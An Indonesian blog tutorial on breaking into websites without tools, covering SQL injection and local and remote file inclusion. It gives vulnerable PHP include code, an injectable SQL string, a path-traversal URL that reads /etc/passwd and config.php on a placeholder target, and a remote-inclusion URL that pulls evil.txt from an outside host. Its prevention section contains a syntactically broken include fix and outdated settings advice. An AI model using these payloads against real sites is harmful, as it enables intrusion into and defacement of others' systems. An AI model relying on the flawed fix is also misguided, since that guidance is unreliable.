Cara Hacking Website Tanpa Menggunakan Software

Cara Hacking Website Tanpa Menggunakan Software – Halo semuanya kali ini saya akan memberikan tutorial bagaimana cara membobol website tanpa menggunakan software atau aplikasi bantuan yang biasa anda dapat di internet maupun forum – forum underground Banyak aplikasi hacking website yang beredar di internet yang bisa anda menggunakannya secara gratis maupun berbayar untuk digunakan sebagai tools pembobol website.

Sebelum kita masuk ke tutorial hacking website terlebih dahulu kita memahami istilah hacking itu sendiri Hacking  merupakan sebuah aktivitas yang sangat erat kaitannya dengan tindakan mengekspoitasi sebuah sistem komputer dengan tujuan memperoleh informasi dari sistem tersebut, aktifitas hacking tidak selamanya berhubungan dengan tindakan kejahatan atau kriminalitas namun juga sering digunakan untuk hal yang baik.

Dalam dunia internet terdapat dua komunitas yang memiliki kemampuan dalam hacking  mereka merupakan orang – orang yang  memiliki keahlian dalam mengekspoitasi sebuah sistem dengan tujuan untuk kebaikan dan kejahatan  mereka sering disebut dengan istilah Hacker / Cracker.

Perbedaan Hacker dan Cracker

Seorang hacker biasanya mempelajari, menganalisa, dan selanjutnya bila menginginkan, bisa membuat, memodifikasi , atau bahkan mengeksploitasi sistem yang terdapat di sebuah perangkat seperti perangkat lunak komputer dan perangkat keras komputer seperti program komputer, administrasi dan hal-hal lainnya , terutama keamanan dengan tujuan untuk hal kebaikan.

Cracker adalah sebutan untuk mereka yang masuk ke sistem orang lain secara ilegal dan merusak sebuah sistem dan mengambil keuntungan dari hasil eksploitasi yang telah dilakukan. cracker lebih bersifat destruktif, biasanya di jaringan komputer, secara sengaja melawan keamanan komputer, men-deface (merubah halaman muka web) milik orang lain bahkan hingga men-delete data orang lain, mencuri data dan umumnya melakukan cracking contoh kasus adalah pembobolan akun facebook, email, instagram , dll

Cara Hacking Website Tanpa Menggunakan Software

Untuk melaukan hacking terhadap sebuah website terlebih dahulu kita mengetahui celah / bug pada website , berikut dibawah ini merupakan daftar celah pada website yang paling umum digunakan yaitu :

1.SQL injection

Merupakan jenis aksi hacking pada keamanan komputer di mana seorang penyerang bisa mendapatkan akses ke basis data di dalam sistem. Bentuk injeksi SQL ini terjadi ketika masukan pengguna tidak disaring dari karakter-karakter pelolos dan kemudian diteruskan ke dalam sebuah pernyataan SQL. Ini menimbulkan potensi untuk memanipulasi pernyataan-pernyataan yang dilakukan pada basis data oleh pengguna akhir aplikasi.

Code :

"SELECT * FROM pengguna WHERE nama = '" + namaPengguna + "';"

2.File Inclusion (LFI & RFI )

Remote File Inclusion (RFI) adalah teknik memanfaatkan celah dalam suatu website secara remote untuk menginclude file file dari luar website tersebut selanjutnya file akan di eksekusi oleh server sedangkan Local File Inclusion (LFI) adalah kebalikan dari Remote File Inclusion (RFI).

Penjelasan
fungsi-fungsi yang dapat menyebabkan LFI/RFI:

Code:

include();
include_once();
require();
require_once();
Dengan persyaratan pada konfigurasi php di server:

Code :
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off

Untuk melakukan injeksi LFI misalkan kita punya file index.php dengan content kodenya seperti ini,

Code :

<?php
$page = $_GET["image"];
include($page);
?>

Misalnya Attacker ingin mengakses file config.php yang ada pada server, maka dia akan mencoba memasukan seperti ini ../../../../../../../../../etc/passwd,  dengan jumlah “../” itu tergantung dari kedalaman folder tempat file config.php tersebut.. dengan begitu isi file passwd akan ditampilkan di browser. kita bisa menggunakan metode menebak struktur folder dalam website target

Url:

http://www.[target].com/page.php?image=........./../config.php%00

Selanjutnya sekarang kita coba cari bug RFI dengan menambahkan link file remote (dari luar website) pada variable imagefile.

Url:

http://www.[target].com/index.php?image=http://www.[remote].com/evil.txt

dengan file evil.txt misal berisi “Hacked by ArezTheHopeBuster” jika ternyata di browser menampilkan kalimat tersebut berarti website tersebut vulner terhadap bug RFI juga.

Pencegahan

Untuk melakukan pencegahan terhadap serangan Local File Inclusion (LFI) dan Remote File Inclusion (RFI) pada website silahkan melakukan beberapa konfirasi dibawah ini :

1. Memvalidasi variable.

2. Mengkonfigurasi kembali settingan php pada server website Anda.

Code :

allow_url_include = off
allow_url_fopen = off
magic_quotes_gpc = on

3. Pada include mungkin bisa ditambahkan “./”
jadinya seperti ini :

Code :

include("./"$_GET[image].".php");

Maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka hasilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page akan ditambah ./ di depannya.

Url:

http://www.[target].com/index.php?image=http://www.[remote]com/evil.txt

Dengan seperti ini server atau website yang diinject akan mencari file http://www.[remote].com/evil.txt dan pastinya akan menyebabkan server menampilkan error bahwa tidak ditemukannya file tsb , Semoga tutor sederhana dan sangat awam tentang Cara Hacking Website Tanpa Menggunakan Software